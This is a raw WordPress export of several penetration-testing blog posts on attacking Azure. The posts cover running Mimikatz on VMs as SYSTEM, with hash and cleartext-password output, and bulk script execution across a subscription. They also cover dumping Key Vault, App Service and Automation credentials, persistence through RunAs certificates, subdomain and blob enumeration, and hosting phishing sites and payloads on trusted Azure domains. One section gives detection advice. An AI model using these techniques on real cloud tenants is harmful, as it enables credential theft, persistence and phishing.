As mentioned in a previous post, Contributor rights on Virtual Machines grants you SYSTEM on Windows and root on Linux VMs. This is really handy for persistence.

When running the AuthenticateAs scripts, make sure that you are running as a local Administrator. You will need the rights to import the PFX file.

It's not very flashy, but here is a GIF that shows what the authentication process looks like.

Authenticateas

One important note about the demo GIF:

I purposefully ran the Get-AzureRmADUser command to show that the RunAs account does not have access to read AzureAD. On the plus side, that RunAs account does have contributor rights on all of the virtual machines. So at a minimum, we can maintain access to the Azure VMs until the certificate is revoked or expires.

In most cases, you should be able to run the "AuthenticateAs" ps1 scripts as they were exported. If the automation RunAs Service Principal account (Example: USER123_V2h5IGFyZSB5b3UgcmVhZGluZyB0aGlzPw==) has been renamed (Example: User123), the "AuthenticateAs" ps1 script will most likely not work. If that is the case, you will need to grab the Application ID for the Automation account and add it to the script. You may have to search/filter a little to find it, but this ID can be found with the following AzureRM command:
Get-AzureRmADServicePrincipal | select DisplayName,ApplicationId

Az Runas

The script will prompt you if the account has been renamed, so keep an eye out for the warning text.

The AppIDs are also captured in the Domain_SPNs.csv (in the Resources folder) output from the Get-AzureDomainInfo function in MicroBurst.

Next Steps

Since I've been seeing a mix of standard Automation credentials and RunAs certificates lately, I wanted to have a way to export both to help maintain a persistent connection to Azure during an assessment. In the next two blogs, I'll cover how we can make use of the access to get more sensitive information from the subscription, and potentially escalate our privileges.

[post_title] => Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exporting-azure-runas-certificates [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:56:35 [post_modified_gmt] => 2021-06-08 21:56:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=10168 [menu_order] => 200 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [18] => WP_Post Object ( [ID] => 9891 [post_author] => 10 [post_date] => 2018-11-06 07:00:23 [post_date_gmt] => 2018-11-06 07:00:23 [post_content] => Let's assume that you're on a penetration test, where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have "Contributor" rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you're lucky, an overly friendly admin may have added the domain users group as contributors for a subscription. Alternatively, we can assume that we started with a lesser privileged user and escalated up to the contributor account. At this point, we could try to gather available credentials, dump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purpose of this post, let's assume that we've exhausted the read-only options and we're still stuck with a somewhat privileged user that doesn't allow us to pivot to other subscriptions (or the internal domain). At this point we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that's noisy and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let's try for command execution on the VMs. In this example environment, let's assume that none of the VMs are publicly exposed and you don't want to open any firewall ports to allow for RDP or other remote management protocols. Even without remote management protocols, there's a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module). This handy command will allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT AuthoritySystem. That's right… VM command execution as System.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell, that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
Let's breakdown the parameters:
  • ResourceGroupName - The Resource Group for the VM
  • VMName - The name of the VM
  • CommandId - The stored type of command to run through Azure.
    • "RunPowerShellScript" allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath - This is the path to your PowerShell PS1 file that you want to run
You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:
PS C:> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test
In this example, we've added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it's been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in, ).
PS C:> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28) .## ^ ##.  
 ## /  ##  /* * *
 ##  / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1] : Code : ComponentStatus/StdErr/succeeded 
Level : Info 
DisplayStatus : Provisioning succeeded 
Message : 
Status : Succeeded 
Capacity : 0 
Count : 0
This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I've added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst For our demo, we'll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.
Import-module MicroBurst.psm1</code> <code>Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds
Mimikatz Med The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 Minutes and 14 seconds. It's not ideal (see below), but it's functional. I haven't taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That's nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:
  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for Sensitive Files
  • Run domain information gathering scripts on one VM and use the output to target other specific VMs for code execution

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands. Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders that are reading this, please be careful with your Owner and Contributor rights. If you have one take away from the post, let it be this - Contributor rights means SYSTEM rights on all the VMs. If you want to cut down your contributor's rights to execute these commands, create a new role for your contributors and limit the Microsoft.Compute/virtualMachines/runCommand/action permissions for your users. Additionally, if you want to detect this, keep an eye out for the "Run Command on Virtual Machine" log entries. It's easy to set up alerts for this, and unless the Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command. The following alert logic will let you know when anyone tries to use this command (Success or Failure). You can also extend the scope of this alert to All VMs in a subscription. Alertlogic As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst Github page. [post_title] => Running PowerShell on Azure VMs at Scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-powershell-scripts-on-azure-vms [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:56:15 [post_modified_gmt] => 2021-06-08 21:56:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9891 [menu_order] => 211 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [19] => WP_Post Object ( [ID] => 9724 [post_author] => 10 [post_date] => 2018-10-02 07:00:50 [post_date_gmt] => 2018-10-02 07:00:50 [post_content] =>

Microsoft makes use of a number of different domains/subdomains for each of their Azure services. We've previously covered some of these domains in a post about using trusted Azure domains for red team activities, but this time we're going to focus on finding existing Azure subdomains as part of the recon process. Also building off of another previous post, where we talked about enumerating Azure storage accounts and public blob files, the script included in this post will do DNS brute forcing to find existing Azure services subdomains.

So why do we want to do this? Let's say that we're doing a pen test against a company (TEST_COMPANY). As part of the recon process, we would want to see if TEST_COMPANY uses any Azure services. If we can confirm a DNS host name for TEST_COMPANY.azurewebsites.net, there's a pretty good chance that there's a TEST_COMPANY website hosted on that Azure host. We can follow a similar process to find additional public facing services for the rest of the domains listed below.

Domains / Associated Services

Here's a list of Azure-related domains that I've identified:

DomainAssociated Service
azurewebsites.netApp Services
scm.azurewebsites.netApp Services - Management
p.azurewebsites.netApp Services
cloudapp.netApp Services
file.core.windows.netStorage Accounts-Files
blob.core.windows.netStorage Accounts-Blobs
queue.core.windows.netStorage Accounts-Queues
table.core.windows.netStorage Accounts-Tables
redis.cache.windows.netDatabases-Redis
documents.azure.comDatabases-Cosmos DB
database.windows.netDatabases-MSSQL
vault.azure.netKey Vaults
onmicrosoft.comMicrosoft Hosted Domain
mail.protection.outlook.comEmail
sharepoint.comSharePoint
azureedge.netCDN
search.windows.netSearch Appliance
azure-api.netAPI Services

Note: I tried to get all of the Azure subdomains into this script but there's a chance that I missed a few. Feel free to add an issue to the repo to let me know if I missed any important ones.

The script for doing the subdomain enumeration relies on finding DNS records for permutations on a base word. In the example below, we used test12345678 as the base word and found a few matches. If you cut the base word to "test123", you will find a significant number of matches (azuretest123, customertest123, dnstest123) with the permutations. While not every Azure service is going to contain the keywords of your client or application name, we do frequently run into services that share names with their owners.

Github/Code Info

The script is part of the MicroBurst GitHub repo and it makes use of the same permutations file (Misc/permutations.txt) from the blob enumeration script.

Usage Example

The usage of this tool is pretty simple.

  • Download the code from GitHub – https://github.com/NetSPI/MicroBurst
  • Load up the module
    • Import-Module .Invoke-EnumerateAzureSubDomains.ps1
    • or load the script file into the PowerShell ISE and hit F5

Example Command:

Invoke-EnumerateAzureSubDomains -Base test12345678 -Verbose

Enumsubdomains

If you’re having issues with the PowerShell execution policy, I still have it on good authority that there’s at least 15 different ways that you can bypass the policy.

Practical Use Cases

The following are a couple of practical use cases for dealing with some of the subdomains that you may find.

App Services - (azure-api.net, cloudapp.net, azurewebsites.net)
As we noted in the first section, the azurewebsites.net domains can indicate existing Azure hosted websites. While most of these will be standard/existing websites, you may get lucky and run into a dev site, or a pre-production site that was not meant to be exposed to the internet. Here, you may have luck finding application security issues, or sensitive information that is not supposed to be internet facing.

It is worth noting that the scm subdomains (test12345678.scm.azurewebsites.net) are for site management, and you should not be able to access those without proper authorization. I don't think it's possible to misconfigure the scm subdomains for public access, but you never know.

Storage Accounts - (file, blob, queue, table.core.windows.net)
Take a look at this previous post and use the same keywords that you find with the subdomain enumeration to see if the discovered storage accounts have public file listings.

Email/SharePoint/Hosted Domain - (onmicrosoft.com, mail.protection.outlook.com, sharepoint.com)
This one is pretty straightforward, but if a company is using Microsoft for email filtering, SharePoint, or if they have a domain that is registered with "onmicrosoft.com", there's a strong indication that they've at least started to get a presence in Azure/Office365.

Databases (database.windows.net, documents.azure.com, redis.cache.windows.net)
Although it's unlikely, there is a chance that Azure database services are publicly exposed, and that there are default credentials on the databases that you find on Azure. Additionally, someone would need to be pretty friendly with their allowed inbound IPs to allow all IPs access to the database, but crazier things have happened.

Azuresqlfw

Subdomain Takeovers
It may take a while to pay off, but enumerating existing Azure subdomains may be handy for anyone looking to do subdomain takeovers. Subdomain takeovers are usually done the other way around (finding a domain that's no longer registered/in use), but by finding the domains now, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers. While testing this script, I found that there's already a few people out there squatting on some existing subdomains (amazon.azurewebsites.net).

Wrap Up

Hopefully this is useful for recon activities for Azure pen testing. Since this active method is not perfect, make sure that you're keeping an eye out for the domains listed above while you're doing more passive recon activities. Feel free to let me know in the comments (or via a pull request) if you have any additional Azure/Microsoft domains that should be added to the list.

[post_title] => Anonymously Enumerating Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enumerating-azure-services [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:55:39 [post_modified_gmt] => 2021-06-08 21:55:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9724 [menu_order] => 215 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 9595 [post_author] => 10 [post_date] => 2018-08-28 07:00:18 [post_date_gmt] => 2018-08-28 07:00:18 [post_content] => During different types of assessments (web app, network, cloud), we will run into situations where we obtain domain credentials that can be used to log into Azure subscriptions. Most commonly, we will externally guess credentials for a privileged domain user, but we’ve also seen excessive permissions in web applications that use Azure AD for authentication. If we’re really lucky, we’ll have access to a user that has rights (typically Owner or Contributor) to access sensitive information in the subscription. If we have privileged access, there are three specific areas that we typically focus on for gathering credentials:
  • Key Vaults
  • App Services Configurations
  • Automation Accounts
There are other places that application/domain credentials could be hiding (See Storage Account files), but these are the first couple of spots that we want to check for credentials. In this post, we’ll go over the key areas where credentials are commonly found and the usage of a PowerShell script (a part of MicroBurst) that I put together to automate the process of gathering credentials from an Azure environment.

Key Vaults

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores. Here’s a quick overview of setting permissions for Key Vaults - https://docs.microsoft.com/en-us/azure/key-vault/key-vault-secure-your-key-vault An example Key Vault Secret: Keyvault For dumping Key Vault values, we’re using some standard Azure PowerShell commands:
  • Get-AzureKeyVaultKey
  • Get-AzureKeyVaultSecret
If you’re just looking at exporting one or two secrets, these commands can be run individually. But since we’re typically trying to access everything that we can in an Azure subscription, we’ve automated the process in the script. The script will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificates locally with the -ExportCerts flag. With access to the keys, secrets, and certificates, you may be able to use them to pivot through systems in the Azure subscription. Additionally, I’ve seen situations where administrators have stored Azure AD user credentials in the Key Vault.

App Services Configurations

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles. In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile. Appservices For dumping App Services configurations, we’re using the following AzureRM PowerShell commands:
  • Get-AzureRmWebApp
  • Get-AzureRmResource
  • Get-AzureRmWebAppPublishingProfile
Again, if this is just a one-off configuration dump, it’s easy to grab the profile from the web portal. But since we’re looking to automate this process, we use the commands above to list out the available apps and profiles for each app. Once the publishing profile is collected by the script, it is then parsed and credentials are returned in the final output table. Potential next steps include uploading a web shell to the App Services web server, or using any parsed connection strings included in the deployment to access the databases. With access to the databases, you could potentially use them as a C2 channel. Check out Scott’s post for more information on that.

Automation Accounts

Automation accounts are one of the ways that you can automate tasks on Azure subscriptions. As part of the automation process, Azure allows these accounts to run code in the Azure environment. This code can be PowerShell or Python, and it can also be very handy for pentesting activities. Autoaccounts The automation account credential gathering process is particularly interesting, as we will have to run some PowerShell in Azure to actually get the credentials for the automation accounts. This section of the script will deploy a Runbook as a ps1 file to the Azure environment in order to get access to the credentials. Basically, the automation script is generated in the tool and includes the automation account name that we’re gathering the credentials for.
$myCredential = Get-AutomationPSCredential -Name 'ACCOUNT_NAME_HERE'</code><code>$userName = $myCredential.UserName</code><code>$password = $myCredential.GetNetworkCredential().Password</code><code>write-output "$userName"</code><code>write-output "$password"
This Microsoft page was a big help in getting this section of the script figured out. Dumping these credentials can take a minute, as the automation script needs to be spooled up and ran on the Azure side. This method of grabbing Automation Account credentials is not the most OpSec safe, but the script does attempt to clean up after itself by deleting the Runbook. As long as the Runbook is successfully deleted at the end of the run, all that will be left is an entry in the Jobs page. Jobentry To help with obscuring these activities, the script generates 15-character job names for each Runbook so it’s hard to tell what was actually run. If you want, you can modify the jobName variable in the code to name it something a little more in line with the tutorial names, but the random names help prevent issues with naming conflicts. Jobtutorials Since the Automation Account credentials are user generated, there’s a chance that the passwords are being reused somewhere else in the environment, but your mileage may vary.

Script Usage

In order for this script to work, you will need to have the AzureRM and Azure PowerShell modules installed. Both modules have different ways to access the same things, but together, they can access everything that we need for this script.
  • Install-Module -Name AzureRM
  • Install-Module -Name Azure
The script will prompt you to install if they’re not already installed, but it doesn’t hurt to get those installed before we start. *Update (3/19/20) - I've updated the scripts to be Az module compliant, so if you're already using the Az modules, you can use the Get-AzPasswords (versus Get-AzurePasswords) instead. The usage of this tool is pretty simple.
  1. Download the code from GitHub - https://github.com/NetSPI/MicroBurst
  2. Load up the module
    1. Import-Module .Get-AzurePasswords.ps1
    2. or load the script file into the PowerShell ISE and hit F5
  3. Get-AzurePasswords -Verbose
    1. Either pipe to Out-Gridview or to Export-CSV for easier parsing
    2. If you’re not already authenticated to the Azure console, it will prompt you to login.
    3. The script will also prompt you for the subscription you would like to use
  4. Review your creds, access other systems, take over the environment
If you’re having issues with the PowerShell execution policy, I have it on good authority that there’s at least 15 different ways that you can bypass the policy. Sample Output:
  • Get-AzurePasswords -Verbose | Out-GridView
Adpoutput Adpgrid *The PowerShell output above and the Out-Gridview output has been redacted to protect the privacy of my test Azure subscription. Alternatively, you can pipe the output to Export-CSV to save the credentials in a CSV. If you don’t redirect the output, the credentials will just be returned as data table entries.

Conclusion

There’s a fair number of places where credentials can hide in an Azure subscription, and there’s plenty of uses for these credentials while attacking an Azure environment. Hopefully this script helps automate your process for gathering those credentials. For those that have read "Pentesting Azure Applications", you may have noticed that they call out the same credential locations in the “Other Azure Services” chapter. I actually had most of this script written prior to the book coming out, but the book really helped me figure out the Automation account credential section. If you haven’t read the book yet, and want a nice deep dive on Azure security, you can get it from no starch press - https://nostarch.com/azure [post_title] => Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => get-azurepasswords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:55:19 [post_modified_gmt] => 2021-06-08 21:55:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9595 [menu_order] => 223 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [21] => WP_Post Object ( [ID] => 9319 [post_author] => 10 [post_date] => 2018-07-17 07:00:28 [post_date_gmt] => 2018-07-17 07:00:28 [post_content] => In recent years, we have seen Microsoft Azure services gathering a larger market share in the cloud space. While they're not seeing quite the adoption that AWS has, we are running into more clients that are using Microsoft Azure services for their operations. If everything is configured correctly, this can be totally fine, but it's pretty rare for an environment to be perfectly secured (and that's why we do security testing). Given the increase in Azure usage, we wanted to dive deeper into automating our standard Azure testing tasks, including the enumeration of publicly available files. In this blog, we'll go over the different types of Azure file stores and how we can potentially enumerate and access publicly available "Blob" files.

Storage Accounts

One of the issues that we've seen within Azure environments is publicly exposing files through storage accounts. These issues are pretty similar to the issues that have come up around public S3 buckets (A good primer here). "Storage Accounts" are Microsoft's way of handling data storage in Azure. Each storage account has a unique subdomain assigned to it in the core.windows.net domain. For example, if I create the netspiazure storage account, I would have netspiazure.core.windows.net assigned to the account.

Storageacct

This subdomain structure also extends out to the different file types within the storage accounts
  • Blobs - netspiazure.blob.core.windows.net
  • File Services - netspiazure.file.core.windows.net
  • Data Tables - netspiazure.table.core.windows.net
  • Queues - netspiazure.queue.core.windows.net

Blobs

For the purpose of this blog, we're just going to focus on the "Blobs", but the other data types are also interesting. Blobs are Microsoft's unstructured data storage objects. Most frequently, we're seeing them used for serving static public data, but we have found blobs being used to store sensitive information (config files, database backups, credentials). Given that Google is indexing about 1.2 million PDFs from the Azure "blob.core.windows.net" subdomain, I think there's pretty decent surface area here. Googlepdfs

Permissions

The blobs themselves are stored within "Containers", which are basically folders. Containers have access policies assigned to them, which determines the level of public access that is available for the files. Permissions If a container has a "Container" public access policy, then anonymous users can list and read any of the files that are in the container. The "Blob" public access policy still allows anonymous users to read files, but they can't list the container files. "Blob" permissions also prevent the basic confirmation of container names via the Azure Blob Service Rest APIs.

Automation

Given the number of Azure environments that we've been running into, I wanted to automate our process for enumerating publicly available blob files. I'm partial to PowerShell, but this script could potentially be ported to other languages. Code for the script can be found on NetSPI's GitHub - https://github.com/NetSPI/MicroBurst At the core of the script, we're doing DNS lookups for blob.core.windows.net subdomains to enumerate valid storage accounts and then brute-force container names using the Azure Blob Service REST APIs. Additionally, the Bing Search API can be used within the tool to find additional storage accounts and containers that are already publicly indexed. Once a valid container name is identified, we use the Azure Blob APIs again to see if the container allows us to list files via the "Container" public access policy. To come up with valid storage account names, we start with a base name (netspi) and either prepend or postpend additional words (dev, test, qa, etc.) that come from a permutations wordlist file. The general idea for this script along with parts of the permutations list comes from a similar tool for AWS S3 buckets - inSp3ctor

Invoke-EnumerateAzureBlobs Usage

The script has five parameters:
  • Base - The base name that you want to run permutations on (netspi)
  • Permutations - The file containing words to use with the base to find the storage accounts (netspidev, testnetspi, etc.)
  • Folders - The file containing potential folder names that you want to brute force (files, docs, etc.)
  • BingAPIKey - The Bing API Key to use for finding additional public files
  • OutputFile - The file to write the output to
Example Output:
PS C:> Invoke-EnumerateAzureBlobs -Base secure -BingAPIKey 12345678901234567899876543210123
Found Storage Account -  secure.blob.core.windows.net
Found Storage Account -  testsecure.blob.core.windows.net
Found Storage Account -  securetest.blob.core.windows.net
Found Storage Account -  securedata.blob.core.windows.net
Found Storage Account -  securefiles.blob.core.windows.net
Found Storage Account -  securefilestorage.blob.core.windows.net
Found Storage Account -  securestorageaccount.blob.core.windows.net
Found Storage Account -  securesql.blob.core.windows.net
Found Storage Account -  hrsecure.blob.core.windows.net
Found Storage Account -  secureit.blob.core.windows.net
Found Storage Account -  secureimages.blob.core.windows.net
Found Storage Account -  securestorage.blob.core.windows.net
Bing Found Storage Account - notrealstorage.blob.core.windows.net
Found Container - hrsecure.blob.core.windows.net/NETSPItest
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/SuperSecretFile.txt
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/TaxReturn.pdf
Found Container - secureimages.blob.core.windows.net/NETSPItest123
    Empty Public Container Available: https://secureimages.blob.core.windows.net/NETSPItest123?restype=container&comp=list
By default, both the "Permutations" and "Folders" parameters are set to the permutations.txt file that comes with the script. You can increase your chances for finding files by adding any client/environment specific terms to that file. Adding in a Bing API Key will also help find additional storage accounts that contain your base word. If you don't already have a Bing API Key set up, navigate to the "Cognitive Services" section of the Azure Portal and create a new "Bing Search v7" instance for your account. There's a free pricing tier that will get you up to 3,000 calls per month, which will hopefully be sufficient. If you are using the Bing API Key, you will be prompted with an out-gridview selection window to select any storage accounts that you want to look at. There are a few publicly indexed Azure storage accounts that seem to hit on most company names. These accounts seem to be indexing documents for or data on multiple companies, so they have a tendency to frequently show up in your Bing results. Several of these accounts also have public file listing, so that may give you a large list of public files that you don't care about. Either way, I've had pretty good luck with the script so far, and hopefully you do too. If you have any issues with the script, feel free to leave a comment or pull request on the GitHub page. [post_title] => Anonymously Enumerating Azure File Resources [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => anonymously-enumerating-azure-file-resources [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:54:42 [post_modified_gmt] => 2021-06-08 21:54:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9319 [menu_order] => 229 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 8846 [post_author] => 10 [post_date] => 2018-05-22 07:00:11 [post_date_gmt] => 2018-05-22 07:00:11 [post_content] =>

Everything seems to be moving into the cloud, so why not move your red team infrastructure there too. Well… lots of people have already been doing that (see here), but what about using hosted services from a cloud provider to hide your activities within the safety of the provider’s trusted domains? That’s something that we haven’t seen as much of, so we decided to start investigating cloud services that would allow us to make use of subdomains from trusted domains.

There are multiple options for cloud providers, so for starters we will be just looking at Microsoft's Azure services. Each cloud provider offers similar services, so you may be able to apply these techniques to other providers.

Domain Reputation Overview

Given that Domain Fronting is kind of on its way out, we wanted to find alternative ways to use trusted domains to bypass filters. One of the benefits of using Azure cloud services for red team engagements is the inherent domain reputation that comes with the domains that are hosting your data (Phishing sites, Payloads, etc.).

To be specific here, these are services hosted by Microsoft that are typically hosted under a Microsoft sub-domain (windows.net, etc.). By making use of a domain that’s already listed as “Good”, we can hopefully bypass any web proxy filters as we work through an engagement.

This is not a comprehensive list of the Azure services and corresponding domains, but we looked at the Talos reputation scores for some of the primary services. These scores can give us an idea of whether or not a web proxy filter would consider our destination domain as trusted. Each Azure domain that we tested came in as Neutral or Good, so that works in our favor.

ServiceBase DomainBase Web ReputationBase Weighted ReputationSubdomain Web ReputationSubdomain Weighted Reputation
App Servicesazurewebsites.netNeutralNo ScoreNeutralNo Score
Blob Storageblob.core.windows.netGoodGoodGoodGood
File Servicefile.core.windows.netGoodGoodGoodGood
AzureSQLdatabase.windows.netGoodGoodGoodGood
Cosmos DBdocuments.azure.comNeutralNeutralNeutralNeutral
IoT Hubazure-devices.netNeutralNo ScoreNeutralNo Score

Note: We also looked at the specific subdomains that were attached to these Azure domains and included their reputations in the last two columns. All subdomains were created fresh and did not get seasoned prior to reputation checking. If you’re looking for ways to get your domain trusted by web proxies, take a look at Ryan Gandrud’s post – Adding Web Content Filter Exceptions for Phishing Success.

For the purposes of this blog, we're just going to focus on the App Services, Blob Storage, and AzureSQL services, but there's plenty of opportunities in the other services for additional research.

Hosting Your Phishing Site

The Azure App Services domains scored Neutral or No Score on the reputation scores, but there’s one great benefit from hosting your phishing site with Azure App Services - the SSL certificate. When you use the default options for spinning up an App Services “Web App”, you will be issued an SSL certificate for the site that is verified by Microsoft.

Cert

Now I would never encourage someone to pretend to be Microsoft, but I hear that it works pretty well for phishing exercises. One downside here is that the TLD (azurewebsites.net) isn’t the most known domain on the internet and it might raise some flags from people looking at the URL.

*This is also probably against the Azure terms and conditions, so insert your standard disclaimer here.

**Update: After posting this blog, my test site changed the ownership information on the SSL certificate (after ~5 days of uptime), so your mileage may vary.

As a security professional, I would probably take issue with that domain, but with a Microsoft verified certificate, I might have less apprehension. When the service was introduced, ZDNet actually called it “phishing-friendly”, but as far as we could find, it hasn’t really been adopted for red team operations.

The setup of an Azure App Services “Web App” is really straightforward and takes about 10 minutes total (assuming your phishing page code is all ready to go).

Check out the Microsoft documentation on how to set up your first App Services Web App here - https://docs.microsoft.com/en-us/azure/app-service/app-service-web-overview

Or just try it out on the Azure Portal – https://portal.azure.com

Storing Your Payloads

Setting up your payload delivery is also easy within Azure. Similar to the AWS S3 service, Microsoft has their own public HTTP file storage solution called Blob Storage. Blobs can be set up under a “Storage Account” using a unique name. The unique naming is due to the fact that each Blob is created as a subdomain of the “blob.core.windows.net” domain.

Blob

For example, any payloads stored in the “notpayloads” blob would be available at https://notpayloads.blob.core.windows.net/. We also found that these domains already had a “Good” reputation, so it makes them a great option for delivering payloads. If you can grab a quality Blob name (updates, photos, etc.), this will also help with the legitimacy of your payload URL.

